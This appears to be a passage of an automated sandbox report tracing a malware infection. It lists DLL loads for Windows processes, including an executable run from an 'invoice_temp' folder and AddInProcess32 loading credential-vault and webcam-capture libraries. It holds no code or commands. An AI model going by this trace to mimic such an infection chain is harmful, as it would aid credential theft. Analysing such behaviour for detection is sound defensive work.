                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: wlidsvc.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: msxml6.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: gamestreamingext.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: msauserext.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: tbs.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: cryptngc.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: cryptnet.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: elscore.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: elstrans.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Program Files\7-Zip\7z.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dllJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeSection loaded: libcares-2.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeSection loaded: icu.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeSection loaded: msvcp290.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mscoree.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: version.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: profapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msasn1.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mswsock.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: secur32.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: schannel.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mskeyprotect.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntasn1.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncrypt.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncryptsslp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: gpapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptnet.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winnsi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winhttp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: webio.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: fwpuclnt.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cabinet.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: amsi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: userenv.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sxs.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: devenum.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winmm.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: devobj.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msdmo.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: avicap32.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msvfw32.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vaultcli.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wintypes.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: propsys.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: edputil.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: urlmon.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iertutil.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: srvcli.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: netutils.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: appresolver.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: bcp47langs.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: slc.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sppc.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windowscodecs.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: moshost.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: mapsbtsvc.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: mosstorage.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: mapconfiguration.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: spp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: vss_ps.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: wuapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: wups.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: unistore.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
